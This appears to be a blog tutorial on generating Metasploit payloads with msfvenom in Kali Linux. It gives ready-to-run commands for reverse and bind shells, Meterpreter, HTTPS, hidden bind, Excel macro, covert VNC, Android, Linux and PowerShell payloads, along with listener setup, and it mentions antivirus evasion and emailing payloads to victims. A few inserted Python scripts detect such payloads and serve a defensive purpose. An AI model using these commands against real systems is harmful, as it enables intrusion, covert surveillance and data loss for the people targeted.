
How to use Msfvenom Commands in Kali Linux

Amit, 10 April 2023

In this article you will learn about the numerous possibilities of Msfvenom and how to use it to construct shellcode in various output formats and with various techniques.


Msfvenom

Msfvenom is Metasploit's command-line tool for generating shellcode. It is also called a payload generating and encoding system because, on June 8, 2015, it replaced msfpayload and msfencode.

Shellcode

Shellcode is malicious computer code that gives its creator a remote shell on the machine where it runs. Nowadays, many large organizations are the target of malicious shellcode.

For example, a hacker named John intercepts a file and sends it to a company employee, who executes it. The hacker gains remote control of the device when the file is installed or executed.

Shellcode can also be inserted into legitimate software to create a backdoor.

Using Msfvenom

Firstly, use the msfvenom program to generate the shellcode file. Secondly, copy the payload to a Windows 7 machine and run it. However, the Windows firewall sometimes blocks this kind of payload. In addition, msfvenom can also encode payloads to bypass antivirus. Thirdly, and most importantly, the Kali Linux system must be configured to listen for incoming connections.

Requirements:

  • Kali Linux with Metasploit
  • Windows 7 Machine on same network
  • Android Phone

Enter the msfvenom command in the Kali Linux terminal. It provides all the options for creating a payload.

msfvenom

Before using msfvenom, read through the options it prints first.

How to generate a payload with Msfvenom

You must select a platform, a payload, and sometimes an encoder before you can create a shell file. In addition, Msfvenom offers capabilities that allow payloads to bypass antivirus software.

Start by listing the 500+ payloads that are currently available:

msfvenom -l payloads

Above all, look briefly at the possible combinations. Some of them involve certain operations, like creating a user. Others are more serious, like “windows/format_all_drives” (also known as ShellcodeOfDeath). This payload formats all mounted drives on the remote target.

Reverse Shell

A reverse shell, often referred to as a connect-back, requires the attacker to first set up a listener on his system. The target computer acts as a client that connects to this listener, and the attacker then receives the shell.

Let us use our Windows 7 PC as a target and create a simple reverse shell.

In the Kali terminal, enter the msfvenom command as shown below:

msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe > payload.exe

  • -p selects the payload.
  • LHOST is the IP address of the Kali Linux machine; run ip addr in another terminal to get your local IP.
  • LPORT is the local port (4444 is the default).
  • -f sets the output format.
  • payload.exe is the name of the generated shellcode file; you can rename it.

How to Setup for Listeners

Transfer the file “payload.exe” to the target computer running Windows 7. For our purposes, you can simply drag and drop the file between the Kali system and the Windows 7 VM.

However, in real life, an attacker would probably try to get the victim to execute the shellcode. For example, by attaching the shellcode file to an official-looking email.

Start Metasploit Framework on Kali Linux by typing msfconsole in the terminal. Then set up a handler to wait for incoming connections:

use exploit/multi/handler

Use the same payload for the listener.

set payload windows/shell/reverse_tcp

Set LPORT to the default port.

set LPORT 4444

For LHOST, use your local IP address.

set LHOST 192.168.1.10

Finally, the handler is ready; start listening with the exploit command.

exploit

Now run the “payload.exe” file on the target Windows system, and the handler in the attacker’s terminal will show the incoming reverse shell.

Just type exit to leave the shell and return to Metasploit. Repeat these steps to listen again.

Msfvenom Bind shell

A bind shell is a shell that starts a new service on the target computer. Consequently, the attacker must connect to establish a session.

msfvenom -p windows/meterpreter/bind_tcp -f exe > bind.exe

Reverse TCP Payload

A reverse shell is also referred to as a connect-back. To use it, the attacker must first set up a listener on his system. The target computer acts as a client that connects to this listener.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=5555 -f exe > reverse_tcp.exe

Msfvenom HTTPS Payload

The question arises: what if the victim has blocked all ports? The previous two payloads can be used only if the victim system has the required ports open.

So we can generate payloads that correspond to the ports that are open on the victim machine, e.g. 443 for HTTPS:

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.107 LPORT=443 -f exe > /root/Desktop/443.exe
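Seen from the target, the reverse shell, reverse TCP and HTTPS payloads above behave the same way: an executable in a user-writable folder opens an outbound connection. The following added example (not code from the original article) flags that pattern in network-connection records; the CSV layout, the sample rows and the path and port lists are constructed for illustration, with column names borrowed from Sysmon Event ID 3.

```python
import csv
import io

# Constructed sample: simplified export of process network-connection events.
# Column names follow Sysmon Event ID 3; every row is made up for this example.
SAMPLE_EVENTS = """\
UtcTime,Image,DestinationIp,DestinationPort,Initiated
2023-04-10 09:14:02,C:\\Program Files\\Mozilla Firefox\\firefox.exe,203.0.113.5,443,true
2023-04-10 09:15:40,C:\\Users\\bob\\Downloads\\payload.exe,192.168.1.10,4444,true
2023-04-10 09:16:11,C:\\Windows\\System32\\svchost.exe,192.168.1.1,53,true
2023-04-10 09:17:25,C:\\Users\\bob\\Desktop\\443.exe,192.168.0.107,443,true
2023-04-10 09:18:03,C:\\Users\\bob\\Desktop\\tool.exe,192.168.1.20,8080,false
"""

# Assumed policy values (not from the article); tune them per environment.
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\windows\\temp\\")
EXPECTED_PORTS = {80, 443}


def suspicious_connections(csv_text):
    """Return (severity, image, destination) for outbound connections opened
    by executables that run from user-writable locations."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["Initiated"].strip().lower() != "true":
            continue  # inbound connection, so not a connect-back
        if not any(part in row["Image"].lower() for part in USER_WRITABLE):
            continue  # installed software and OS binaries are out of scope
        port = int(row["DestinationPort"])
        # A web port only lowers the severity: the HTTPS payload uses 443
        # precisely because that port is allowed out.
        severity = "medium" if port in EXPECTED_PORTS else "high"
        findings.append((severity, row["Image"], f'{row["DestinationIp"]}:{port}'))
    return findings


if __name__ == "__main__":
    for severity, image, dest in suspicious_connections(SAMPLE_EVENTS):
        print(f"[{severity}] {image} -> {dest}")
```
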

Hidden Bind TCP Payload

Let us look at another method offered by the msfvenom tool for exploiting the target computer. This time we get a command shell on the victim computer and not a meterpreter session.

This payload runs invisibly in the background while active and is not detected by any port scanner, because the port only answers connections from the address given in AHOST.

msfvenom -p windows/shell_hidden_bind_tcp AHOST=192.168.0.10 LPORT=1010 -f exe > hidden.exe
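Both bind payloads above leave a listening socket on the target, and even when a port scanner does not detect it, the host's own socket table still lists the listener. The following added example (not code from the original article) compares Windows `netstat -ano` output against a baseline of approved listeners; the sample output, PIDs and baseline are constructed for illustration.

```python
import re

# Constructed sample of `netstat -ano` output from a Windows host.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       888
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:1010           0.0.0.0:0              LISTENING       3204
  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING       2972
  TCP    192.168.0.20:49211     192.168.0.10:445       ESTABLISHED     4
  TCP    [::]:135               [::]:0                 LISTENING       888
  UDP    0.0.0.0:5353           *:*                                    1520
"""

# Assumed baseline of listeners approved for this host build (hypothetical).
BASELINE_PORTS = {135, 445}

# Matches only TCP rows in the LISTENING state; handles IPv4 and [IPv6] forms.
LISTEN_RE = re.compile(
    r"^\s*TCP\s+(?P<addr>\S+):(?P<port>\d+)\s+\S+\s+LISTENING\s+(?P<pid>\d+)\s*$"
)


def unexpected_listeners(netstat_text, baseline=BASELINE_PORTS):
    """Return sorted (port, pid, local_address) tuples for TCP listeners
    whose port is not in the approved baseline."""
    found = set()
    for line in netstat_text.splitlines():
        match = LISTEN_RE.match(line)
        if not match:
            continue  # header, UDP row, or a connection that is not listening
        port = int(match.group("port"))
        if port not in baseline:
            found.add((port, int(match.group("pid")), match.group("addr")))
    return sorted(found)


if __name__ == "__main__":
    for port, pid, addr in unexpected_listeners(SAMPLE_NETSTAT):
        print(f"unexpected listener {addr}:{port} owned by PID {pid}")
```

The PID column identifies the owning process, which can then be looked up on the host with tasklist.
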

Reverse Shell Payload with Netcat

Let us repeat the procedure with the shell_reverse_tcp payload, another method to get the victim’s shell session. As a reverse payload, it takes LHOST rather than AHOST.

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.107 LPORT=4444 -f exe > ncshell.exe

Macro Payload

To exploit the PC target, we now generate a payload using a VBA script. This payload is used to create an Excel macro.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=7777 -f vba
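Because the -f vba output above is macro source text, a mail or file gateway that extracts macros can triage it before a user opens the document. The following added example (not code from the original article, and not a signature of msfvenom's exact output) flags macros that combine an auto-run entry point with Win32 memory or thread API declarations; the sample macros, the API list and the verdict names are assumptions made for illustration.

```python
import re

# Constructed macro source: declarations only, arguments elided, no payload.
SAMPLE_MACRO = '''\
Private Declare PtrSafe Function CreateThread Lib "kernel32" (...) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (...) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (...) As LongPtr

Sub Auto_Open()
    ' body omitted
End Sub
'''

# Constructed benign macro for comparison.
BENIGN_MACRO = '''\
Sub FormatReport()
    Range("A1").Font.Bold = True
End Sub
'''

# Entry points that Office runs automatically when a document is opened.
AUTO_EXEC = re.compile(
    r'^\s*(?:Private\s+|Public\s+)?Sub\s+(Auto_?Open|Workbook_Open|Document_Open)\b',
    re.IGNORECASE | re.MULTILINE)
# VBA declarations that import a function from a native DLL.
NATIVE_DECLARE = re.compile(
    r'^\s*(?:Private\s+|Public\s+)?Declare\s+(?:PtrSafe\s+)?(?:Function|Sub)'
    r'\s+(\w+)\s+Lib\s+"[^"]+"',
    re.IGNORECASE | re.MULTILINE)
# Assumed indicator list: APIs used to allocate, fill and run memory in-process.
MEMORY_EXEC_APIS = {"virtualalloc", "rtlmovememory", "createthread"}


def triage_macro(source):
    """Classify macro source as 'block', 'review' or 'allow'."""
    entry_points = sorted({m.group(1) for m in AUTO_EXEC.finditer(source)})
    apis = sorted({m.group(1) for m in NATIVE_DECLARE.finditer(source)
                   if m.group(1).lower() in MEMORY_EXEC_APIS})
    if entry_points and apis:
        verdict = "block"    # runs on open and can execute memory it fills
    elif entry_points or apis:
        verdict = "review"   # one indicator alone is common in real macros
    else:
        verdict = "allow"
    return {"verdict": verdict, "entry_points": entry_points, "apis": apis}
```
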

VNC Payload

This payload allows us to access the victim’s computer over VNC without him knowing about it and to observe his behavior in secret.

msfvenom -p windows/vncinject/reverse_tcp LHOST=192.168.0.107 LPORT=5900 -f exe > /root/Desktop/vnc.exe

Msfvenom Android Payload

Let us use one of the Android payloads available in the msfvenom tool. Mobile exploitation has always been a hot topic, and it still is today.

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=4444 > file.apk

Linux Payload

For the Linux payload, open Kali Terminal and type the following command:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=4444 -f elf > shell

PowerShell Payload

In the Kali terminal, enter the following command to create a payload for Windows PowerShell:

msfvenom -p cmd/windows/reverse_powershell LHOST=192.168.1.10 LPORT=4444 > shell.bat

Last but not least – Metasploit Payloads (Detailed Spreadsheet)
